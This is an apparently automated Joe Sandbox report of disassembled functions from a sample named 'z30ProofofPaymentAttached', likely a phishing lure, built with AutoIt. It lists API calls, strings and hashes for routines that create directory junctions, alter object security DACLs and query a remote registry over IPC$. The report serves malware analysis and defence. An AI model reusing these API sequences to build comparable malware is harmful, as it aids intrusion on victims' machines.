Opcode ID: 6cf0e63ecd1ca23aac3c491f6674e44460921cbafefa8d206827e1c5ba9692b4
Instruction ID: d7cab3797161610289fb29117573854509a76b6838ae9de4fd64421982947480
Opcode Fuzzy Hash: 6cf0e63ecd1ca23aac3c491f6674e44460921cbafefa8d206827e1c5ba9692b4
Instruction Fuzzy Hash: CB414C72800219BACB14FBE1DD86EEFB77CAF54740F100065F60576092EA296F09EFA1

Function 00FFD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FFD0D8
__swprintf.LIBCMT ref: 00FFD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 00FFD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00FFD15C
_memset.LIBCMT ref: 00FFD17B
_wcsncpy.LIBCMT ref: 00FFD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00FFD1EC
CloseHandle.KERNEL32(00000000), ref: 00FFD1F7
RemoveDirectoryW.KERNEL32(?), ref: 00FFD200
CloseHandle.KERNEL32(00000000), ref: 00FFD20A

Strings

:, xrefs: 00FFD11B
\??\%s, xrefs: 00FFD0F4
\, xrefs: 00FFD110

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 6e6610bcf0f7ba48dbe9447af65a070970f7706165c8acc5fff3762740804beb
Instruction ID: 447951efd118c582ec620d1abe73b0cc096e48f76552430432a998427dd2f22c
Opcode Fuzzy Hash: 6e6610bcf0f7ba48dbe9447af65a070970f7706165c8acc5fff3762740804beb
Instruction Fuzzy Hash: A631B0B2900109ABDB21DFA0CC49FEB77BEEF89710F5040B6F609D2164EB7496449B64

Function 0101E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0101BEF4,?,?), ref: 0101E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E783
GlobalLock.KERNEL32(00000000), ref: 0101E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E79B
GlobalUnlock.KERNEL32(00000000), ref: 0101E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0101BEF4,?,?,00000000,?), ref: 0101E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0103D9BC,?), ref: 0101E7D5
GlobalFree.KERNEL32(00000000), ref: 0101E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0101E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0101E834
DeleteObject.GDI32(00000000), ref: 0101E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0101E872

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: ded9fd315f64f31f9dcbe955730645f184971e45f7458da93218309f5b4c8bce
Instruction ID: 9744bbd1ea93b157d6cdad3b11dc5bb3e255987d7e9758d9dbd7063b291c7d8f
Opcode Fuzzy Hash: ded9fd315f64f31f9dcbe955730645f184971e45f7458da93218309f5b4c8bce
Instruction Fuzzy Hash: 4D414B75500204FFDB229FA5D848EAE7BBDFF89711F108058F94A97254C7399941CB20

Function 010005F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0100076F
_wcscat.LIBCMT ref: 01000787
_wcscat.LIBCMT ref: 01000799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 010007AE
SetCurrentDirectoryW.KERNEL32(?), ref: 010007C2
GetFileAttributesW.KERNEL32(?), ref: 010007DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 010007F4
SetCurrentDirectoryW.KERNEL32(?), ref: 01000806

Strings

*.*, xrefs: 01000845

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 93ccb001c0cd0180a15849a690abf89cacc248f68c09222052b5a9ebb9182ec3
Instruction ID: b6b06618276f5b181f9d6ad690d30f1b62a007645d4c605689fe6f5da42eafca
Opcode Fuzzy Hash: 93ccb001c0cd0180a15849a690abf89cacc248f68c09222052b5a9ebb9182ec3
Instruction Fuzzy Hash: BD81C4715043419FEB61DF28CC44AAEB7E9BBC8380F18886EF5C9C7285EB34D9448B52

Function 0101EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FCB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FCB35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0101EF3B
GetFocus.USER32 ref: 0101EF4B
GetDlgCtrlID.USER32(00000000), ref: 0101EF56
_memset.LIBCMT ref: 0101F081
GetMenuItemInfoW.USER32 ref: 0101F0AC
GetMenuItemCount.USER32(00000000), ref: 0101F0CC
GetMenuItemID.USER32(?,00000000), ref: 0101F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0101F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0101F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0101F1C8

Strings

0, xrefs: 0101F079

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 55e6bddccfaaf26e61fb8293aa3bb34600ef67dc17d27fcab8e1e328c6eb9daf
Instruction ID: 392cd42acbab443ba204779512217be06c0c1840e1e1bb0bd44a89ae398a24e9
Opcode Fuzzy Hash: 55e6bddccfaaf26e61fb8293aa3bb34600ef67dc17d27fcab8e1e328c6eb9daf
Instruction Fuzzy Hash: B981BF71504302AFD721CF18C884AAFBBE9FB89314F00456EF9D597285D779D809CB92

Function 00FEA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FEABD7
Part of subcall function 00FEABBB: GetLastError.KERNEL32(?,00FEA69F,?,?,?), ref: 00FEABE1
Part of subcall function 00FEABBB: GetProcessHeap.KERNEL32(00000008,?,?,00FEA69F,?,?,?), ref: 00FEABF0
Part of subcall function 00FEABBB: HeapAlloc.KERNEL32(00000000,?,00FEA69F,?,?,?), ref: 00FEABF7
Part of subcall function 00FEABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FEAC0E

Part of subcall function 00FEAC56: GetProcessHeap.KERNEL32(00000008,00FEA6B5,00000000,00000000,?,00FEA6B5,?), ref: 00FEAC62
Part of subcall function 00FEAC56: HeapAlloc.KERNEL32(00000000,?,00FEA6B5,?), ref: 00FEAC69
Part of subcall function 00FEAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FEA6B5,?), ref: 00FEAC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FEA8CB
_memset.LIBCMT ref: 00FEA8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FEA8FF
GetLengthSid.ADVAPI32(?), ref: 00FEA910
GetAce.ADVAPI32(?,00000000,?), ref: 00FEA94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FEA969
GetLengthSid.ADVAPI32(?), ref: 00FEA986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FEA995
HeapAlloc.KERNEL32(00000000), ref: 00FEA99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FEA9BD
CopySid.ADVAPI32(00000000), ref: 00FEA9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FEA9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FEAA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FEAA2F

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 16c92d6a6aeebea1c48c30aa1dc8c30073890bff2655b67301367f902a11ecb3
Instruction ID: 014c1e0d2922cbd8c25809a24cf87e2b44137f4829c66a7c10ee3cc4f712fcbb
Opcode Fuzzy Hash: 16c92d6a6aeebea1c48c30aa1dc8c30073890bff2655b67301367f902a11ecb3
Instruction Fuzzy Hash: 22515C71900249EFDF10DFA5DD85AEEBB7AFF44710F048129F911AB280DB39AA05DB61

Function 01009DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 01009E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 01009E42
CreateCompatibleDC.GDI32(?), ref: 01009E4E
SelectObject.GDI32(00000000,?), ref: 01009E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01009EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 01009EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01009F0F
SelectObject.GDI32(00000006,?), ref: 01009F17
DeleteObject.GDI32(?), ref: 01009F20
DeleteDC.GDI32(00000006), ref: 01009F27
ReleaseDC.USER32(00000000,?), ref: 01009F32

Strings

(, xrefs: 01009ED7

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 8297624fadc129ed31e9054dba3fac9b00ffc5959309ad3bde7811db2ed47dc3
Instruction ID: 465cd391c7331a5d6bb8f1fc147ae52d32a0699048518e96639ee752b574cf3c
Opcode Fuzzy Hash: 8297624fadc129ed31e9054dba3fac9b00ffc5959309ad3bde7811db2ed47dc3
Instruction Fuzzy Hash: A3515A75900309EFDB25CFA8C885EAEBBB9EF48710F14841DF99A97250C736A840CB50

Function 00FFCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00FFCCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 00FFCCC5
__swprintf.LIBCMT ref: 00FFCD1E
__swprintf.LIBCMT ref: 00FFCD37
_wprintf.LIBCMT ref: 00FFCDED
_wprintf.LIBCMT ref: 00FFCE0B

Strings

Line %d (File "%s"):, xrefs: 00FFCD18, 00FFCD31
Error: , xrefs: 00FFCDB5
^ ERROR, xrefs: 00FFCD8F
"%s" (%d) : ==> %s:%s%s, xrefs: 00FFCDE8
"%s" (%d) : ==> %s:, xrefs: 00FFCE06

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 3bcb257c1acc3ec6f9a84244115c538c8a0e01b279a254c198eb46bcc2515b03
Instruction ID: 0199d122979ed1976c58d1ea5d0301f496c0a2040adf0ca8bdb644d2ff95e9ca
Opcode Fuzzy Hash: 3bcb257c1acc3ec6f9a84244115c538c8a0e01b279a254c198eb46bcc2515b03
Instruction Fuzzy Hash: C251BF71D0011DBACB15EBE1CE42EEEB778AF04300F104066F505761A2EB796E58EFA0

Function 00FFCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00FFCA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00FFCAB0
__swprintf.LIBCMT ref: 00FFCB09
__swprintf.LIBCMT ref: 00FFCB22
_wprintf.LIBCMT ref: 00FFCBCD
_wprintf.LIBCMT ref: 00FFCBEB

Strings

Line %d (File "%s"):, xrefs: 00FFCB03, 00FFCB1C
Error: , xrefs: 00FFCB95
"%s" (%d) : ==> %s:%s%s, xrefs: 00FFCBC8
"%s" (%d) : ==> %s:, xrefs: 00FFCBE6
^ ERROR , xrefs: 00FFCB64

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: a56a226d6ee691df2d9e225117f5e9d0034008d3d2dc8ebf7ae9e3e9e932e6d0
Instruction ID: 5b7580040be36be22931ed24d940ef9aafaf0232755fe027da6070b31bd77f75
Opcode Fuzzy Hash: a56a226d6ee691df2d9e225117f5e9d0034008d3d2dc8ebf7ae9e3e9e932e6d0
Instruction Fuzzy Hash: 2651C271D0011DBACB15EBE1CE42EEEB778AF04300F100065F605760A2EB796E58EFA1

Function 00FF55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF55D7
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FF5664
GetMenuItemCount.USER32(01071708), ref: 00FF56ED
DeleteMenu.USER32(01071708,00000005,00000000,000000F5,?,?), ref: 00FF577D
DeleteMenu.USER32(01071708,00000004,00000000), ref: 00FF5785
DeleteMenu.USER32(01071708,00000006,00000000), ref: 00FF578D
DeleteMenu.USER32(01071708,00000003,00000000), ref: 00FF5795
GetMenuItemCount.USER32(01071708), ref: 00FF579D
SetMenuItemInfoW.USER32(01071708,00000004,00000000,00000030), ref: 00FF57D3
GetCursorPos.USER32(?), ref: 00FF57DD
SetForegroundWindow.USER32(00000000), ref: 00FF57E6
TrackPopupMenuEx.USER32(01071708,00000000,?,00000000,00000000,00000000), ref: 00FF57F9
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF5805

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 83e211693392ece846ae2f5408c9bb4a68cb94465a432a302904a7ec9510998b
Instruction ID: dbada26e724fbe85824525cacbc8363c5056bd257876b4d5055a43a68b249bcc
Opcode Fuzzy Hash: 83e211693392ece846ae2f5408c9bb4a68cb94465a432a302904a7ec9510998b
Instruction Fuzzy Hash: 5571D371A40A0DBAEB219F55CC49FBABF65FF00B68F640205F724AA1E1C7756810EB94

Function 00FEA14D Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FEA1DC
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FEA211
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FEA22D
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FEA249
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FEA273
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FEA29B
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FEA2A6
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FEA2AB

Strings

\IPC$, xrefs: 00FEA1F3
\CLSID, xrefs: 00FEA193
SOFTWARE\Classes\, xrefs: 00FEA17D

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1687751970-22481851
Opcode ID: b344d83e9f13ad68e0770d983f82dc33ef126bf1b6674b374e62a5879b112657
Instruction ID: eb8f2f53dce1f6550ee064a02eedc69d6ebc4d7cac4b8e110368857b2ac147c3
Opcode Fuzzy Hash: b344d83e9f13ad68e0770d983f82dc33ef126bf1b6674b374e62a5879b112657
Instruction Fuzzy Hash: 66410876C10229ABCB21EBA5DC85DEEB778BF04750F004429F901B7151EB79AE05EF90

Function 01013C06 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,01012BB5,?,?), ref: 01013C1D

Strings

HKCC, xrefs: 01013CD1
HKEY_CLASSES_ROOT, xrefs: 01013C96
HKCU, xrefs: 01013CF3
HKCR, xrefs: 01013CAB
HKEY_CURRENT_CONFIG, xrefs: 01013CC0
HKEY_USERS, xrefs: 01013D04
HKEY_CURRENT_USER, xrefs: 01013CE2
HKLM, xrefs: 01013C81
HKEY_LOCAL_MACHINE, xrefs: 01013C6C
HKU, xrefs: 01013D15

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: 831e7a9d874a99692771d2e58769f369a9c7ec86311773e30b252e07599ee4bf
Instruction ID: 20efe28ea02719647443b74b2badacbd0e29b3fca04e34a3429f0472868e5f48
Opcode Fuzzy Hash: 831e7a9d874a99692771d2e58769f369a9c7ec86311773e30b252e07599ee4bf
Instruction Fuzzy Hash: 07416D3010024A8BDF01FF14ED52AEB3769BF52310F804898ECD55F69BEB78A91ACB50

Function 00FF25B5 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,010236F4,00000010,?,Bad directive syntax error,0104DC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FF25D6
LoadStringW.USER32(00000000,?,010236F4,00000010), ref: 00FF25DD
_wprintf.LIBCMT ref: 00FF2610
__swprintf.LIBCMT ref: 00FF2632
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FF26A1

Strings

Line %d (File "%s"):, xrefs: 00FF2647
Error: , xrefs: 00FF266F
., xrefs: 00FF2687
Line %d:, xrefs: 00FF262C
%s (%d) : ==> %s.: %s %s, xrefs: 00FF260B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297849606.000000000106A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297867353.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fb0000_z30ProofofPaymentAttached.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1080873982-4153970271
Opcode ID: 3137c33137b1f0b2b45da673acfae7c9fcd9e1040fd813ae05dd92cd2553506b
Instruction ID: 341119ea15e13cdc79226e9265926c9cec92b65afea5d527c268053c8624195c
Opcode Fuzzy Hash: 3137c33137b1f0b2b45da673acfae7c9fcd9e1040fd813ae05dd92cd2553506b
Instruction Fuzzy Hash: B221603180021EBFCF11AF91CC4AFEE7739BF18704F044459F5156A1A2DA79A518EF50

Function 00FF7AD9 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FF7B42
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FF7B58
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FF7B69
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FF7B7B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FF7B8C

Strings

play PlayMe, xrefs: 00FF7B87
status PlayMe mode, xrefs: 00FF7B3D
play PlayMe wait, xrefs: 00FF7B76
open , xrefs: 00FF7AF1
close PlayMe, xrefs: 00FF7B53, 00FF7B80
alias PlayMe, xrefs: 00FF7B1B

Memory Dump Source

Source File: 00000001.00000002.1297736353.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000001.00000002.1297714376.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000103D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1297805839.000000000105E000.00000002.00000001.01000000.00000003.sdmpDownload File
